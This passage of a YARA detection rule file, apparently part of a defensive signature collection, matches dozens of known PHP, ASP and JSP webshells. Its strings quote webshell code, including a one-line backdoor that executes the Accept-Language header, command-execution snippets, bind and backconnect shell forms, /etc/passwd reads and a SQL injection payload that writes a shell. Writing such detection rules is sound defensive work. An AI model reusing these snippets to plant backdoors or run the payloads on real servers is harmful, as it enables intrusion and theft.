Roth" hash = "db076b7c80d2a5279cab2578aa19cb18aea92832" strings: $s1 = "<option value=\"/etc/passwd\">Get /etc/passwd</option>" fullword $s6 = "by PHP Emperor<xb5@hotmail.com>" fullword $s9 = "\".htmlspecialchars($file).\" has been already loaded. PHP Emperor <xb5@hotmail." $s11 = "die(\"<FONT COLOR=\\\"RED\\\"><CENTER>Sorry... File" fullword $s15 = "if(empty($_GET['file'])){" fullword $s16 = "echo \"<head><title>Safe Mode Shell</title></head>\"; " fullword condition: 3 of them } rule WebShell_Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit { meta: description = "PHP Webshells Github Archive - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php" author = "Florian Roth" hash = "b2b797707e09c12ff5e632af84b394ad41a46fa4" strings: $s4 = "$liz0zim=shell_exec($_POST[liz0]); " fullword $s6 = "$liz0=shell_exec($_POST[baba]); " fullword $s9 = "echo \"<b><font color=blue>Liz0ziM Private Safe Mode Command Execuriton Bypass E" $s12 = " :=) :</font><select size=\"1\" name=\"liz0\">" fullword $s13 = "<option value=\"cat /etc/passwd\">/etc/passwd</option>" fullword condition: 1 of them } rule WebShell_php_backdoor { meta: description = "PHP Webshells Github Archive - file php-backdoor.php" author = "Florian Roth" hash = "b190c03af4f3fb52adc20eb0f5d4d151020c74fe" strings: $s5 = "http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=/etc on *nix" fullword $s6 = "// a simple php backdoor | coded by z0mbie [30.08.03] | http://freenet.am/~zombi" $s11 = "if(!isset($_REQUEST['dir'])) die('hey,specify directory!');" fullword $s13 = "else echo \"<a href='$PHP_SELF?f=$d/$dir'><font color=black>\";" fullword $s15 = "<pre><form action=\"<? echo $PHP_SELF; ?>\" METHOD=GET >execute command: <input " condition: 1 of them } rule WebShell_Worse_Linux_Shell { meta: description = "PHP Webshells Github Archive - file Worse Linux Shell.php" author = "Florian Roth" hash = "64623ab1246bc8f7d256b25f244eb2b41f543e96" strings: $s4 = "if( $_POST['_act'] == \"Upload!\" ) {" fullword $s5 = "print \"<center><h1>#worst @dal.net</h1></center>\";" fullword $s7 = "print \"<center><h1>Linux Shells</h1></center>\";" fullword $s8 = "$currentCMD = \"ls -la\";" fullword $s14 = "print \"<tr><td><b>System type:</b></td><td>$UName</td></tr>\";" fullword $s19 = "$currentCMD = str_replace(\"\\\\\\\\\",\"\\\\\",$_POST['_cmd']);" fullword condition: 2 of them } rule WebShell_php_webshells_pHpINJ { meta: description = "PHP Webshells Github Archive - file pHpINJ.php" author = "Florian Roth" hash = "75116bee1ab122861b155cc1ce45a112c28b9596" strings: $s3 = "echo '<a href='.$expurl.'> Click Here to Exploit </a> <br />';" fullword $s10 = "<form action = \"<?php echo \"$_SERVER[PHP_SELF]\" ; ?>\" method = \"post\">" fullword $s11 = "$sql = \"0' UNION SELECT '0' , '<? system(\\$_GET[cpc]);exit; ?>' ,0 ,0 ,0 ,0 IN" $s13 = "Full server path to a writable file which will contain the Php Shell <br />" fullword $s14 = "$expurl= $url.\"?id=\".$sql ;" fullword $s15 = "<header>|| .::News PHP Shell Injection::. ||</header> <br /> <br />" fullword $s16 = "<input type = \"submit\" value = \"Create Exploit\"> <br /> <br />" fullword condition: 1 of them } rule WebShell_php_webshells_NGH { meta: description = "PHP Webshells Github Archive - file NGH.php" author = "Florian Roth" hash = "c05b5deecfc6de972aa4652cb66da89cfb3e1645" strings: $s0 = "<title>Webcommander at <?=$_SERVER[\"HTTP_HOST\"]?></title>" fullword $s2 = "/* Webcommander by Cr4sh_aka_RKL v0.3.9 NGH edition :p */" fullword $s5 = "<form action=<?=$script?>?act=bindshell method=POST>" fullword $s9 = "<form action=<?=$script?>?act=backconnect method=POST>" fullword $s11 = "<form action=<?=$script?>?act=mkdir method=POST>" fullword $s16 = "die(\"<font color=#DF0000>Login error</font>\");" fullword $s20 = "<b>Bind /bin/bash at port: </b><input type=text name=port size=8>" fullword condition: 2 of them } rule WebShell_php_webshells_matamu { meta: description = "PHP Webshells Github Archive - file matamu.php" author = "Florian Roth" hash = "d477aae6bd2f288b578dbf05c1c46b3aaa474733" strings: $s2 = "$command .= ' -F';" fullword $s3 = "/* We try and match a cd command. */" fullword $s4 = "directory... Trust me - it works :-) */" fullword $s5 = "$command .= \" 1> $tmpfile 2>&1; \" ." fullword $s10 = "$new_dir = $regs[1]; // 'cd /something/...'" fullword $s16 = "/* The last / in work_dir were the first charecter." fullword condition: 2 of them } rule WebShell_ru24_post_sh { meta: description = "PHP Webshells Github Archive - file ru24_post_sh.php" author = "Florian Roth" hash = "d2c18766a1cd4dda928c12ff7b519578ccec0769" strings: $s1 = "http://www.ru24-team.net" fullword $s4 = "if ((!$_POST['cmd']) || ($_POST['cmd']==\"\")) { $_POST['cmd']=\"id;pwd;uname -a" $s6 = "Ru24PostWebShell" $s7 = "Writed by DreAmeRz" fullword $s9 = "$function=passthru; // system, exec, cmd" fullword condition: 1 of them } rule WebShell_hiddens_shell_v1 { meta: description = "PHP Webshells Github Archive - file hiddens shell v1.php" author = "Florian Roth" hash = "1674bd40eb98b48427c547bf9143aa7fbe2f4a59" strings: $s0 = "<?$d='G7mHWQ9vvXiL/QX2oZ2VTDpo6g3FYAa6X+8DMIzcD0eHZaBZH7jFpZzUz7XNenxSYvBP2Wy36U" condition: all of them } rule WebShell_c99_madnet { meta: description = "PHP Webshells Github Archive - file c99_madnet.php" author = "Florian Roth" hash = "17613df393d0a99fd5bea18b2d4707f566cff219" strings: $s0 = "$md5_pass = \"\"; //If no pass then hash" fullword $s1 = "eval(gzinflate(base64_decode('" $s2 = "$pass = \"pass\"; //Pass" fullword $s3 = "$login = \"user\"; //Login" fullword $s4 = " //Authentication" fullword condition: all of them } rule WebShell_c99_locus7s { meta: description = "PHP Webshells Github Archive - file c99_locus7s.php" author = "Florian Roth" hash = "d413d4700daed07561c9f95e1468fb80238fbf3c" strings: $s8 = "$encoded = base64_encode(file_get_contents($d.$f)); " fullword $s9 = "$file = $tmpdir.\"dump_\".getenv(\"SERVER_NAME\").\"_\".$db.\"_\".date(\"d-m-Y" $s10 = "else {$tmp = htmlspecialchars(\"./dump_\".getenv(\"SERVER_NAME\").\"_\".$sq" $s11 = "$c99sh_sourcesurl = \"http://locus7s.com/\"; //Sources-server " fullword $s19 = "$nixpwdperpage = 100; // Get first N lines from /etc/passwd " fullword condition: 2 of them } rule WebShell_JspWebshell_1_2 { meta: description = "PHP Webshells Github Archive - file JspWebshell_1.2.php" author = "Florian Roth" hash = "0bed4a1966117dd872ac9e8dceceb54024a030fa" strings: $s0 = "System.out.println(\"CreateAndDeleteFolder is error:\"+ex); " fullword $s1 = "String password=request.getParameter(\"password\");" fullword $s3 = "<%@ page contentType=\"text/html; charset=GBK\" language=\"java\" import=\"java." $s7 = "String editfile=request.getParameter(\"editfile\");" fullword $s8 = "//String tempfilename=request.getParameter(\"file\");" fullword $s12 = "password = (String)session.getAttribute(\"password\");" fullword condition: 3 of them } rule WebShell_safe0ver { meta: description = "PHP Webshells Github Archive - file safe0ver.php" author = "Florian Roth" hash = "366639526d92bd38ff7218b8539ac0f154190eb8" strings: $s3 = "$scriptident = \"$scriptTitle By Evilc0der.com\";" fullword $s4 = "while (file_exists(\"$lastdir/newfile$i.txt\"))" fullword $s5 = "else { /* <!-- Then it must be a File... --> */" fullword $s7 = "$contents .= htmlentities( $line ) ;" fullword $s8 = "<br><p><br>Safe Mode ByPAss<p><form method=\"POST\">" fullword $s14 = "elseif ( $cmd==\"upload\" ) { /* <!-- Upload File form --> */ " fullword $s20 = "/* <!-- End of Actions --> */" fullword condition: 3 of them } rule WebShell_Uploader { meta: description = "PHP Webshells Github Archive - file Uploader.php" author = "Florian Roth" hash = "e216c5863a23fde8a449c31660fd413d77cce0b7" strings: $s1 = "move_uploaded_file($userfile, \"entrika.php\"); " fullword condition: all of them } rule WebShell_php_webshells_kral { meta: description = "PHP Webshells Github Archive - file kral.php" author = "Florian Roth" hash = "4cd1d1a2fd448cecc605970e3a89f3c2e5c80dfc" strings: $s1 = "$adres=gethostbyname($ip);" fullword $s3 = "curl_setopt($ch,CURLOPT_POSTFIELDS,\"domain=\".$site);" fullword $s4 = "$ekle=\"/index.php?option=com_user&view=reset&layout=confirm\";" fullword $s16 = "echo $son.' <br> <font color=\"green\">Access</font><br>';" fullword $s17 = "<p>kodlama by <a href=\"mailto:priv8coder@gmail.com\">BLaSTER</a><br /" $s20 = "<p><strong>Server listeleyici</strong><br />" fullword condition: 2 of them } rule WebShell_cgitelnet { meta: description = "PHP Webshells Github Archive - file cgitelnet.php" author = "Florian Roth" hash = "72e5f0e4cd438e47b6454de297267770a36cbeb3" strings: $s9 = "# Author Homepage: http://www.rohitab.com/" fullword $s10 = "elsif($Action eq \"command\") # user wants to run a command" fullword $s18 = "# in a command line on Windows NT." fullword $s20 = "print \"Transfered $TargetFileSize Bytes.<br>\";" fullword condition: 2 of them } rule WebShell_simple_backdoor { meta: description = "PHP Webshells Github Archive - file simple-backdoor.php" author = "Florian Roth" hash = "edcd5157a68fa00723a506ca86d6cbb8884ef512" strings: $s0 = "<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->" fullword $s1 = "<!-- http://michaeldaw.org 2006 -->" fullword $s2 = "Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd" fullword $s3 = " echo \"</pre>\";" fullword $s4 = " $cmd = ($_REQUEST['cmd']);" fullword $s5 = " echo \"<pre>\";" fullword $s6 = "if(isset($_REQUEST['cmd'])){" fullword $s7 = " die;" fullword $s8 = " system($cmd);" fullword condition: all of them } rule WebShell_Safe_Mode_Bypass_PHP_4_4_2_and_PHP_5_1_2_2 { meta: description = "PHP Webshells Github Archive - file Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php" author = "Florian Roth" hash = "8fdd4e0e87c044177e9e1c97084eb5b18e2f1c25" strings: $s1 = "<option value=\"/etc/passwd\">Get /etc/passwd</option>" fullword $s3 = "xb5@hotmail.com</FONT></CENTER></B>\");" fullword $s4 = "$v = @ini_get(\"open_basedir\");" fullword $s6 = "by PHP Emperor<xb5@hotmail.com>" fullword condition: 2 of them } rule WebShell_NTDaddy_v1_9 { meta: description = "PHP Webshells Github Archive - file NTDaddy v1.9.php" author = "Florian Roth" hash = "79519aa407fff72b7510c6a63c877f2e07d7554b" strings: $s2 = "| -obzerve : mr_o@ihateclowns.com |" fullword $s6 = "szTempFile = \"C:\\\" & oFileSys.GetTempName( )" fullword $s13 = "<form action=ntdaddy.asp method=post>" fullword $s17 = "response.write(\"<ERROR: THIS IS NOT A TEXT FILE>\")" fullword condition: 2 of them } rule WebShell_lamashell { meta: description = "PHP Webshells Github Archive - file lamashell.php" author = "Florian Roth" hash = "b71181e0d899b2b07bc55aebb27da6706ea1b560" strings: $s0 = "if(($_POST['exe']) == \"Execute\") {" fullword $s8 = "$curcmd = $_POST['king'];" fullword $s16 = "\"http://www.w3.org/TR/html4/loose.dtd\">" fullword $s18 = "<title>lama's'hell v. 3.0</title>" fullword $s19 = "_|_ O _ O _|_" fullword $s20 = "$curcmd = \"ls -lah\";" fullword condition: 2 of them } rule WebShell_Simple_PHP_backdoor_by_DK { meta: description = "PHP Webshells Github Archive - file Simple_PHP_backdoor_by_DK.php" author = "Florian Roth" hash = "03f6215548ed370bec0332199be7c4f68105274e" strings: $s0 = "<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->" fullword $s1 = "<!-- http://michaeldaw.org 2006 -->" fullword $s2 = "Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd" fullword $s6 = "if(isset($_REQUEST['cmd'])){" fullword $s8 = "system($cmd);" fullword condition: 2 of them } rule WebShell_Moroccan_Spamers_Ma_EditioN_By_GhOsT { meta: description = "PHP Webshells Github Archive - file Moroccan Spamers Ma-EditioN By GhOsT.php" author = "Florian Roth" hash = "31e5473920a2cc445d246bc5820037d8fe383201" strings: $s4 = "$content = chunk_split(base64_encode($content)); " fullword $s12 = "print \"Sending mail to $to....... \"; " fullword $s16 = "if (!$from && !$subject && !$message && !$emaillist){ " fullword condition: all of them } rule WebShell_C99madShell_v__2_0_madnet_edition { meta: description = "PHP Webshells Github Archive - file C99madShell v. 2.0 madnet edition.php" author = "Florian Roth" hash = "f99f8228eb12746847f54bad45084f19d1a7e111" strings: $s0 = "$md5_pass = \"\"; //If no pass then hash" fullword $s1 = "eval(gzinflate(base64_decode('" $s2 = "$pass = \"\"; //Pass" fullword $s3 = "$login = \"\"; //Login" fullword $s4 = "//Authentication" fullword condition: all of them } rule WebShell_CmdAsp_asp_php { meta: description = "PHP Webshells Github Archive - file CmdAsp.asp.php.txt" author = "Florian Roth" hash = "cb18e1ac11e37e236e244b96c2af2d313feda696" strings: $s1 = "szTempFile = \"C:\\\" & oFileSys.GetTempName( )" fullword $s4 = "' Author: Maceo <maceo @ dogmile.com>" fullword $s5 = "' -- Use a poor man's pipe ... a temp file -- '" fullword $s6 = "' --------------------o0o--------------------" fullword $s8 = "' File: CmdAsp.asp" fullword $s11 = "<-- CmdAsp.asp -->" fullword $s14 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)" fullword $s16 = "Set oScriptNet = Server.CreateObject(\"WSCRIPT.NETWORK\")" fullword $s19 = "<%= \"\\\\\" & oScriptNet.ComputerName & \"\\\" & oScriptNet.UserName %>" fullword condition: 4 of them } rule WebShell_NCC_Shell { meta: description = "PHP Webshells Github Archive - file NCC-Shell.php" author = "Florian Roth" hash = "64d4495875a809b2730bd93bec2e33902ea80a53" strings: $s0 = " if (isset($_FILES['probe']) and ! $_FILES['probe']['error']) {" fullword $s1 = "<b>--Coded by Silver" fullword $s2 = "<title>Upload - Shell/Datei</title>" fullword $s8 = "<a href=\"http://www.n-c-c.6x.to\" target=\"_blank\">-->NCC<--</a></center></b><" $s14 = "~|_Team .:National Cracker Crew:._|~<br>" fullword $s18 = "printf(\"Sie ist %u Bytes gro" fullword condition: 3 of them } rule WebShell_php_webshells_README { meta: description = "PHP Webshells Github Archive - file README.md" author = "Florian Roth" hash = "ef2c567b4782c994db48de0168deb29c812f7204" strings: $s0 = "Common php webshells. Do not host the file(s) in your server!" fullword $s1 = "php-webshells" fullword condition: all of them } rule WebShell_backupsql { meta: description = "PHP Webshells Github Archive - file backupsql.php" author = "Florian Roth" hash = "863e017545ec8e16a0df5f420f2d708631020dd4" strings: $s0 = "$headers .= \"\\nMIME-Version: 1.0\\n\" .\"Content-Type: multipart/mixed;\\n\" ." $s1 = "$ftpconnect = \"ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplog" $s2 = "* as email attachment, or send to a remote ftp server by" fullword $s16 = "* Neagu Mihai<neagumihai@hotmail.com>" fullword $s17 = "$from = \"Neu-Cool@email.com\"; // Who should the emails be sent from?, may " condition: 2 of them } rule WebShell_AK_74_Security_Team_Web_Shell_Beta_Version { meta: description = "PHP Webshells Github Archive - file AK-74 Security Team Web Shell Beta Version.php" author = "Florian Roth" hash = "c90b0ba575f432ecc08f8f292f3013b5532fe2c4" strings: $s8 = "- AK-74 Security Team Web Site: www.ak74-team.net" fullword $s9 = "<b><font color=#830000>8. X Forwarded For IP - </font></b><font color=#830000>'." $s10 = "<b><font color=#83000>Execute system commands!</font></b>" fullword condition: 1 of them } rule WebShell_php_webshells_cpanel { meta: description = "PHP Webshells Github Archive - file cpanel.php" author = "Florian Roth" hash = "433dab17106b175c7cf73f4f094e835d453c0874" strings: $s0 = "function ftp_check($host,$user,$pass,$timeout){" fullword $s3 = "curl_setopt($ch, CURLOPT_URL, \"http://$host:2082\");" fullword $s4 = "[ user@alturks.com ]# info<b><br><font face=tahoma><br>" fullword $s12 = "curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);" fullword $s13 = "Powerful tool , ftp and cPanel brute forcer , php 5.2.9 safe_mode & open_basedir" $s20 = "<br><b>Please enter your USERNAME and PASSWORD to logon<br>" fullword condition: 2 of them } rule WebShell_accept_language { meta: description = "PHP Webshells Github Archive - file accept_language.php" author = "Florian Roth" hash = "180b13576f8a5407ab3325671b63750adbcb62c9" strings: $s0 = "<?php passthru(getenv(\"HTTP_ACCEPT_LANGUAGE\")); echo '<br> by q1w2e3r4'; ?>" fullword condition: all of them } rule WebShell_php_webshells_529 { meta: description = "PHP Webshells Github Archive - file 529.php" author = "Florian Roth" hash = "ba3fb2995528307487dff7d5b624d9f4c94c75d3" strings: $s0 = "<p>More: <a href=\"/\">Md5Cracking.Com Crew</a> " fullword $s7 = "href=\"/\" title=\"Securityhouse\">Security House - Shell Center - Edited By Kin" $s9 = "echo '<PRE><P>This is exploit from <a " fullword $s10 = "This Exploit Was Edited By KingDefacer" fullword $s13 = "safe_mode and open_basedir Bypass PHP 5.2.9 " fullword $s14 = "$hardstyle = explode(\"/\", $file); " fullword $s20 = "while($level--) chdir(\"..\"); " fullword condition: 2 of them } rule WebShell_STNC_WebShell_v0_8 { meta: description = "PHP Webshells Github Archive - file STNC WebShell v0.8.php" author = "Florian Roth" hash = "52068c9dff65f1caae8f4c60d0225708612bb8bc" strings: $s3 = "if(isset($_POST[\"action\"])) $action = $_POST[\"action\"];" fullword $s8 = "elseif(fe(\"system\")){ob_start();system($s);$r=ob_get_contents();ob_end_clean()" $s13 = "{ $pwd = $_POST[\"pwd\"]; $type = filetype($pwd); if($type === \"dir\")chdir($pw" condition: 2 of them } rule WebShell_php_webshells_tryag { meta: description = "PHP Webshells Github Archive - file tryag.php" author = "Florian Roth" hash = "42d837e9ab764e95ed11b8bd6c29699d13fe4c41" strings: $s1 = "<title>TrYaG Team - TrYaG.php - Edited By KingDefacer</title>" fullword $s3 = "$tabledump = \"DROP TABLE IF EXISTS $table;\\n\"; " fullword $s6 = "$string = !empty($_POST['string']) ? $_POST['string'] : 0; " fullword $s7 = "$tabledump .= \"CREATE TABLE $table (\\n\"; " fullword $s14 = "echo \"<center><div id=logostrip>Edit file: $editfile </div><form action='$REQUE" condition: 3 of them } rule WebShell_dC3_Security_Crew_Shell_PRiV_2 { meta: description = "PHP Webshells Github Archive - file dC3 Security Crew Shell PRiV.php" author = "Florian Roth" hash = "9077eb05f4ce19c31c93c2421430dd3068a37f17" strings: $s0 = "@rmdir($_GET['file']) or die (\"[-]Error deleting dir!\");" fullword $s9 = "header(\"Last-Modified: \".date(\"r\",filemtime(__FILE__)));" fullword $s13 = "header(\"Content-type: image/gif\");" fullword $s14 = "@copy($file,$to) or die (\"[-]Error copying file!\");" fullword $s20 = "if (isset($_GET['rename_all'])) {" fullword condition: 3 of them } rule WebShell_qsd_php_backdoor { meta: description = "PHP Webshells Github Archive - file qsd-php-backdoor.php" author = "Florian Roth" hash = "4856bce45fc5b3f938d8125f7cdd35a8bbae380f" strings: $s1 = "// A robust backdoor script made by Daniel Berliner - http://www.qsdconsulting.c" $s2 = "if(isset($_POST[\"newcontent\"]))" fullword $s3 = "foreach($parts as $val)//Assemble the path back together" fullword $s7 = "$_POST[\"newcontent\"]=urldecode(base64_decode($_POST[\"newcontent\"]));" fullword condition: 2 of them } rule WebShell_php_webshells_spygrup { meta: description = "PHP Webshells Github Archive - file spygrup.php" author = "Florian Roth" hash = "12f9105332f5dc5d6360a26706cd79afa07fe004" strings: $s2 = "kingdefacer@msn.com</FONT></CENTER></B>\");" fullword $s6 = "if($_POST['root']) $root = $_POST['root'];" fullword $s12 = "\".htmlspecialchars($file).\" Bu Dosya zaten Goruntuleniyor<kingdefacer@msn.com>" fullword $s18 = "By KingDefacer From Spygrup.org>" fullword condition: 3 of them } rule WebShell_Web_shell__c_ShAnKaR { meta: description = "PHP Webshells Github Archive - file Web-shell (c)ShAnKaR.php" author = "Florian Roth" hash = "3dd4f25bd132beb59d2ae0c813373c9ea20e1b7a" strings: $s0 = "header(\"Content-Length: \".filesize($_POST['downf']));" fullword $s5 = "if($_POST['save']==0){echo \"<textarea cols=70 rows=10>\".htmlspecialchars($dump" $s6 = "write(\"#\\n#Server : \".getenv('SERVER_NAME').\"" fullword $s12 = "foreach(@file($_POST['passwd']) as $fed)echo $fed;" fullword condition: 2 of them } rule WebShell_Ayyildiz_Tim___AYT__Shell_v_2_1_Biz { meta: description = "PHP Webshells Github Archive - file Ayyildiz Tim -AYT- Shell v 2.1 Biz.php" author = "Florian Roth" hash = "5fe8c1d01dc5bc70372a8a04410faf8fcde3cb68" strings: $s7 = "<meta name=\"Copyright\" content=TouCh By iJOo\">" fullword $s11 = "directory... Trust me - it works :-) */" fullword $s15 = "/* ls looks much better with ' -F', IMHO. */" fullword $s16 = "} else if ($command == 'ls') {" fullword condition: 3 of them } rule WebShell_Gamma_Web_Shell { meta: description = "PHP Webshells Github Archive - file Gamma Web Shell.php" author = "Florian Roth" hash = "7ef773df7a2f221468cc8f7683e1ace6b1e8139a" strings: $s4 = "$ok_commands = ['ls', 'ls -l', 'pwd', 'uptime'];" fullword $s8 = "### Gamma Group <http://www.gammacenter.com>" fullword $s15 = "my $error = \"This command is not available in the restricted mode.\\n\";" fullword $s20 = "my $command = $self->query('command');" fullword condition: 2 of them } rule WebShell_php_webshells_aspydrv { meta: description = "PHP Webshells Github Archive - file aspydrv.php" author = "Florian Roth" hash = "3d8996b625025dc549d73cdb3e5fa678ab35d32a" strings: $s0 = "Target = \"D:\\hshome\\masterhr\\masterhr.com\\\" ' ---Directory to which files" $s1 = "nPos = InstrB(nPosEnd, biData, CByteString(\"Content-Type:\"))" fullword $s3 = "Document.frmSQL.mPage.value = Document.frmSQL.mPage.value - 1" fullword $s17 = "If request.querystring(\"getDRVs\")=\"@\" then" fullword $s20 = "' ---Copy Too Folder routine Start" fullword condition: 3 of them } rule WebShell_JspWebshell_1_2_2 { meta: description = "PHP Webshells Github Archive - file JspWebshell 1.2.php" author = "Florian Roth" hash = "184fc72b51d1429c44a4c8de43081e00967cf86b" strings: $s0 = "System.out.println(\"CreateAndDeleteFolder is error:\"+ex); " fullword $s3 = "<%@ page contentType=\"text/html; charset=GBK\" language=\"java\" import=\"java." $s4 = "// String tempfilepath=request.getParameter(\"filepath\");" fullword $s15 = "endPoint=random1.getFilePointer();" fullword $s20 = "if (request.getParameter(\"command\") != null) {" fullword condition: 3 of them } rule WebShell_g00nshell_v1_3 { meta: description = "PHP Webshells Github Archive - file g00nshell-v1.3.php" author = "Florian Roth" hash = "70fe072e120249c9e2f0a8e9019f984aea84a504" strings: $s10 = "#To execute commands, simply include ?cmd=___ in the url. #" fullword $s15 = "$query = \"SHOW COLUMNS FROM \" . $_GET['table'];" fullword $s16 = "$uakey = \"724ea055b975621b9d679f7077257bd9\"; // MD5 encoded user-agent" fullword $s17 = "echo(\"<form method='GET' name='shell'>\");" fullword $s18 = "echo(\"<form method='post' action='?act=sql'>\");" fullword condition: 2 of them } rule WebShell_WinX_Shell { meta: description = "PHP Webshells Github Archive - file WinX Shell.php" author = "Florian Roth" hash = "a94d65c168344ad9fa406d219bdf60150c02010e" strings: $s4 = "// It's simple shell for all Win OS." fullword $s5 = "//------- [netstat -an] and [ipconfig] and [tasklist] ------------" fullword $s6 = "<html><head><title>-:[GreenwooD]:- WinX Shell</title></head>" fullword $s13 = "// Created by greenwood from n57" fullword $s20 = " if (is_uploaded_file($userfile)) {" fullword condition: 3 of them } rule WebShell_PHANTASMA { meta: description = "PHP Webshells Github Archive - file PHANTASMA.php" author = "Florian Roth" hash = "cd12d42abf854cd34ff9e93a80d464620af6d75e" strings: $s12 = "\" printf(\\\"Usage: %s [Host] <port>\\\\n\\\", argv[0]);\\n\" ." fullword $s15 = "if ($portscan != \"\") {" fullword $s16 = "echo \"<br>Banner: $get <br><br>\";" fullword $s20 = "$dono = get_current_user( );" fullword condition: 3 of them } rule WebShell_php_webshells_cw { meta: description = "PHP Webshells Github Archive - file cw.php" author = "Florian Roth" hash = "e65e0670ef6edf0a3581be6fe5ddeeffd22014bf" strings: $s1 = "// Dump Database [pacucci.com]" fullword $s2 = "$dump = \"-- Database: \".$_POST['db'] .\" \\n\";" fullword $s7 = "$aids = passthru(\"perl cbs.pl \".$_POST['connhost'].\" \".$_POST['connport']);" fullword $s8 = "<b>IP:</b> <u>\" . $_SERVER['REMOTE_ADDR'] .\"</u> - Server IP:</b> <a href='htt" $s14 = "$dump .= \"-- Cyber-Warrior.Org\\n\";" fullword $s20 = "if(isset($_POST['doedit']) && $_POST['editfile'] != $dir)" fullword condition: 3 of them } rule WebShell_php_include_w_shell { meta: description = "PHP Webshells Github Archive - file php-include-w-shell.php" author = "Florian Roth" hash = "1a7f4868691410830ad954360950e37c582b0292" strings: $s13 = "# dump variables (DEBUG SCRIPT) NEEDS MODIFINY FOR B64 STATUS!!" fullword $s17 = "\"phpshellapp\" => \"export TERM=xterm; bash -i\"," fullword $s19 = "else if($numhosts == 1) $strOutput .= \"On 1 host..\\n\";" fullword condition: 1 of them } rule WebShell_mysql_tool { meta: description = "PHP Webshells Github Archive - file mysql_tool.php" author = "Florian Roth" hash = "c9cf8cafcd4e65d1b57fdee5eef98f0f2de74474" strings: $s12 = "$dump .= \"-- Dumping data for table '$table'\\n\";" fullword $s20 = "$dump .= \"CREATE TABLE $table (\\n\";" fullword condition: 2 of them } rule WebShell_PhpSpy_Ver_2006 { meta: description = "PHP Webshells Github Archive - file PhpSpy Ver 2006.php" author = "Florian Roth" hash = "34a89e0ab896c3518d9a474b71ee636ca595625d" strings: $s2 = "var_dump(@$shell->RegRead($_POST['readregname']));" fullword $s12 = "$prog = isset($_POST['prog']) ? $_POST['prog'] : \"/c net start > \".$pathname." $s19 = "$program = isset($_POST['program']) ? $_POST['program'] : \"c:\\winnt\\system32" $s20 = "$regval = isset($_POST['regval']) ? $_POST['regval'] : 'c:\\winnt\\backdoor.exe'" condition: 1 of them } rule WebShell_ZyklonShell { meta: description = "PHP Webshells Github Archive - file ZyklonShell.php" author = "Florian Roth" hash = "3fa7e6f3566427196ac47551392e2386a038d61c" strings: $s0 = "The requested URL /Nemo/shell/zyklonshell.txt was not found on this server.<P>" fullword $s1 = "<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">" fullword $s2 = "<TITLE>404 Not Found</TITLE>" fullword $s3 = "<H1>Not Found</H1>" fullword condition: all of them } rule WebShell_php_webshells_myshell { meta: description = "PHP Webshells Github Archive - file myshell.php" author = "Florian Roth" hash = "5bd52749872d1083e7be076a5e65ffcde210e524" strings: $s0 = "if($ok==false &&$status && $autoErrorTrap)system($command . \" 1> /tmp/outpu" $s5 = "system($command . \" 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/o" $s15 = "<title>$MyShellVersion - Access Denied</title>" fullword $s16 = "}$ra44 = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_SERVER['HTT" condition: 1 of them } rule WebShell_php_webshells_lolipop { meta: description = "PHP Webshells Github Archive - file lolipop.php" author = "Florian Roth" hash = "86f23baabb90c93465e6851e40104ded5a5164cb" strings: $s3 = "$commander = $_POST['commander']; " fullword $s9 = "$sourcego = $_POST['sourcego']; " fullword $s20 = "$result = mysql_query($loli12) or die (mysql_error()); " fullword condition: all of them } rule WebShell_simple_cmd { meta: description = "PHP Webshells Github Archive - file simple_cmd.php" author = "Florian Roth" hash = "466a8caf03cdebe07aa16ad490e54744f82e32c2" strings: $s1 = "<input type=TEXT name=\"-cmd\" size=64 value=\"<?=$cmd?>\" " fullword $s2 = "<title>G-Security Webshell</title>" fullword $s4 = "<? if($cmd != \"\") print Shell_Exec($cmd);?>" fullword $s6 = "<? $cmd = $_REQUEST[\"-cmd\"];?>" fullword condition: 1 of them } rule WebShell_go_shell { meta: description = "PHP Webshells Github Archive - file go-shell.php" author = "Florian Roth" hash = "3dd85981bec33de42c04c53d081c230b5fc0e94f" strings: $s0 = "#change this password; for power security - delete this file =)" fullword $s2 = "if (!defined$param{cmd}){$param{cmd}=\"ls -la\"};" fullword $s11 = "open(FILEHANDLE, \"cd $param{dir}&&$param{cmd}|\");" fullword $s12 = "print << \"[kalabanga]\";" fullword $s13 = "<title>GO.cgi</title>" fullword condition: 1 of them } rule WebShell_aZRaiLPhp_v1_0 { meta: description = "PHP Webshells Github Archive - file aZRaiLPhp v1.0.php" author = "Florian Roth" hash = "a2c609d1a8c8ba3d706d1d70bef69e63f239782b" strings: $s0 = "<font size='+1'color='#0000FF'>aZRaiLPhP'nin URL'si: http://$HTTP_HOST$RED" $s4 = "$fileperm=base_convert($_POST['fileperm'],8,10);" fullword $s19 = "touch (\"$path/$dismi\") or die(\"Dosya Olu" fullword $s20 = "echo \"<div align=left><a href='./$this_file?dir=$path/$file'>G" fullword condition: 2 of them } rule WebShell_webshells_zehir4 { meta: description = "Webshells Github Archive - file zehir4" author = "Florian Roth" hash = "788928ae87551f286d189e163e55410acbb90a64" score = 55 strings: $s0 = "frames.byZehir.document.execCommand(command, false, option);" fullword $s8 = "response.Write \"<title>ZehirIV --> Powered By Zehir <zehirhacker@hotmail.com" condition: 1 of them } rule WebShell_zehir4_asp_php { meta: description = "PHP Webshells Github Archive - file zehir4.asp.php.txt" author = "Florian Roth" hash = "1d9b78b5b14b821139541cc0deb4cbbd994ce157" strings: $s4 = "response.Write \"<title>zehir3 --> powered by zehir <zehirhacker@hotmail.com&" $s11 = "frames.byZehir.document.execCommand(" $s15 = "frames.byZehir.document.execCommand(co" condition: 2 of them } rule WebShell_php_webshells_lostDC { meta: description = "PHP Webshells Github Archive - file lostDC.php" author = "Florian Roth" hash = "d54fe07ea53a8929620c50e3a3f8fb69fdeb1cde" strings: $s0 = "$info .= '[~]Server: ' .$_SERVER['HTTP_HOST'] .'<br />';" fullword $s4 = "header ( \"Content-Description: Download manager\" 